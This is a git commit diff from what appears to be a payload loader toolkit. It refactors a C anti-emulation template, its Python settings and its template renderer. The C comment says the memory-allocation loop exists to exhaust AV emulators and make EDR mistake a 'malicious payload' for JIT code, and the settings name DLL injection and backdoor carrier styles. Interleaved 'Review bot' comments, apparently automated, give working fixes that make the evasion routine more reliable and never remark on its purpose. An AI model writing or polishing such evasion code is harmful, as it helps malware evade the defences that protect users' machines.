refactor: improve sirallocalot

This commit is contained in:
Dobin
2024-07-07 12:36:15 +01:00
parent b868c29c7d
commit 4bed8d1a95
4 changed files with 38 additions and 35 deletions
+21 -28
@@ -1,28 +1,31 @@
#define SIR_ITERATION_COUNT {{SIR_ITERATION_COUNT}}
#define SIR_ALLOC_COUNT {{SIR_ALLOC_COUNT}}
#define SIR_SLEEP_TIME 200 // ms
/* This will allocate SIR_ALLOC_COUNT RW memory regions, /* This will allocate SIR_ALLOC_COUNT RW memory regions,
set them to RX, and free them set them to RX, and free them.
And this SIR_ITERATION_COUNT times.
SIR_ITERATION_COUNT: Single digits, around 5
SIR_ALLOC_COUNT: Tripple digits, around 100
The idea is that the AV emulator will probably give up, either because Memory : SIR_ALLOC_COUNT * payload_length
of used memory is above maximum, or amount of instructions, or Cycles : SIR_ALLOC_COUNT * payload_length * SIR_ITERATION_COUNT
number of API calls, or time. Time : SIR_ALLOC_COUNT * SIR_ITERATION_COUNT * payload_length * ?
API calls: SIR_ALLOC_COUNT * SIR_ITERATION_COUNT * 3
It hopefully also makes the EDR think this program is doing some The idea is that the AV emulator will probably give up, either because
kind of interpreter or JIT compilation, and not a malicious payload. of used memory is above maximum, or amount of instructions, or
number of API calls, or time.
It hopefully also makes the EDR think this program is doing some
kind of interpreter or JIT compilation, and not a malicious payload.
*/ */
void antiemulation() { void antiemulation() {
void* allocs[SIR_ALLOC_COUNT]; void* allocs[{{SIR_ALLOC_COUNT}}];
DWORD result; DWORD result;
for(int i=0; i<SIR_ITERATION_COUNT; i++) { for(int i=0; i<{{SIR_ITERATION_COUNT}}; i++) {
for(int n=0; n<SIR_ALLOC_COUNT; n++) { for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
allocs[n] = VirtualAlloc( allocs[n] = VirtualAlloc(
NULL, NULL,
{{PAYLOAD_LEN}}, {{PAYLOAD_LEN}},
@@ -37,33 +40,23 @@ void antiemulation() {
} }
} }
// Write something. for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
/*for(int n=0; n<SIR_ALLOC_COUNT; n++) {
char *alloc = allocs[n];
alloc[0] = 0; // overwrite the first byte
}*/
for(int n=0; n<SIR_ALLOC_COUNT; n++) {
if (VirtualProtect( if (VirtualProtect(
allocs[n], allocs[n],
{{PAYLOAD_LEN}}, {{PAYLOAD_LEN}},
p_RX, p_RX,
&result) == 0) &result) == 0)
{ {
return 7; return;
} }
} }
Sleep(SIR_SLEEP_TIME);
BOOL bSuccess; BOOL bSuccess;
for(int n=0; n<SIR_ALLOC_COUNT; n++) { for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
bSuccess = VirtualFree( bSuccess = VirtualFree(
allocs[n], allocs[n],
{{PAYLOAD_LEN}}, {{PAYLOAD_LEN}},
0x00008000); // MEM_RELEASE 0x00008000); // MEM_RELEASE
} }
} }
} }
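Review bot: `bSuccess` from the VirtualFree call is assigned but never examined, and with `0x00008000` (MEM_RELEASE) VirtualFree requires the size argument to be 0, so passing `{{PAYLOAD_LEN}}` there makes every call fail and none of the regions is actually released. Pass `0` as the size when releasing and check the result, `if (!VirtualFree(allocs[n], 0, 0x00008000)) { /* report failure */ }`. The early `return;` on VirtualProtect failure likewise leaves the current iteration's allocations unreleased; it should break to the free loop rather than leave the function. The new comment block still reads 'Tripple digits' — `SIR_ALLOC_COUNT: Triple digits, around 100`. The lines between the two hunks (old 28–36) are not visible, so how a failed VirtualAlloc is handled cannot be judged here.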
@@ -22,6 +22,8 @@ char *supermega_payload;
{{plugin_executionguardrail}} {{plugin_executionguardrail}}
{{plugin_virtualprotect}}
int main() int main()
{ {
+4
@@ -23,6 +23,10 @@ class Settings():
self.dllfunc: str = "" # For DLL injection self.dllfunc: str = "" # For DLL injection
# Anti-debugging
self.sir_iteration_count: int = 5
self.sir_alloc_count: int = 100
# Injectable # Injectable
self.carrier_invoke_style: CarrierInvokeStyle = CarrierInvokeStyle.BackdoorCallInstr self.carrier_invoke_style: CarrierInvokeStyle = CarrierInvokeStyle.BackdoorCallInstr
self.inject_exe_in: FilePath = "" self.inject_exe_in: FilePath = ""
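Review bot: The new section comment `# Anti-debugging` mislabels these two fields; they are read by create_c_from_template for the antiemulation template (its log line says 'AntiEmulation'), so `# Anti-emulation (sirallocalot template)` would match their actual use. It would also help to record the effective bound on the field itself, e.g. `self.sir_alloc_count: int = 100  # capped to 256 when the template is rendered`, since the cap is enforced in a different module.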
+11 -7
@@ -60,15 +60,19 @@ def create_c_from_template(settings: Settings, payload_len: int):
filepath_antiemulation = PATH_ANTIEMULATION + "{}.c".format( filepath_antiemulation = PATH_ANTIEMULATION + "{}.c".format(
settings.plugin_antiemulation) settings.plugin_antiemulation)
with open(filepath_antiemulation, "r", encoding='utf-8') as file: with open(filepath_antiemulation, "r", encoding='utf-8') as file:
sir_iteration_count = 5 sir_iteration_count = settings.sir_iteration_count
sir_alloc_count = (int(config.get("sir_target_mem")) / payload_len)+1 sir_alloc_count = settings.sir_alloc_count
# if too large, compiler will add a __checkstk dependency # sir_alloc_count = int((int(config.get("sir_target_mem")) / payload_len))+1
if sir_alloc_count > 256: max_alloc_count = 256
sir_alloc_count = 256 if sir_alloc_count > max_alloc_count:
logging.info(" AntiEmulation target: iterations: {} alloc: {}".format( # if too large, compiler will add a __checkstk dependency
logging.warning("Too large sir allocation count {}, setting to max {}".format(
sir_alloc_count, max_alloc_count
))
sir_alloc_count = max_alloc_count
logging.info("> AntiEmulation: iterations: {} allocs: {}".format(
sir_iteration_count, sir_alloc_count) sir_iteration_count, sir_alloc_count)
) )
plugin_antiemualation = file.read() plugin_antiemualation = file.read()
plugin_antiemualation = Template(plugin_antiemualation).render({ plugin_antiemualation = Template(plugin_antiemualation).render({
'PAYLOAD_LEN': payload_len, 'PAYLOAD_LEN': payload_len,
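Review bot: The cap at `max_alloc_count = 256` only guards the upper bound; a zero or negative `settings.sir_alloc_count` still reaches the template and yields `void* allocs[0]`, which is not valid C, so add a lower-bound check before rendering, `if sir_alloc_count < 1 or sir_iteration_count < 1: raise ValueError("sir_alloc_count and sir_iteration_count must be positive")`. The commented-out `sir_target_mem` computation on the line above should be deleted rather than kept as dead code, and if a `sir_target_mem` config key still exists elsewhere it is now silently ignored, which is worth stating in the config documentation. `256` deserves a named module-level constant such as `MAX_SIR_ALLOC_COUNT = 256` with the stack-probe reason attached to it; the comment's spelling `__checkstk` looks like a typo for MSVC's `__chkstk` helper. The body of create_c_from_template continues past the end of the hunk.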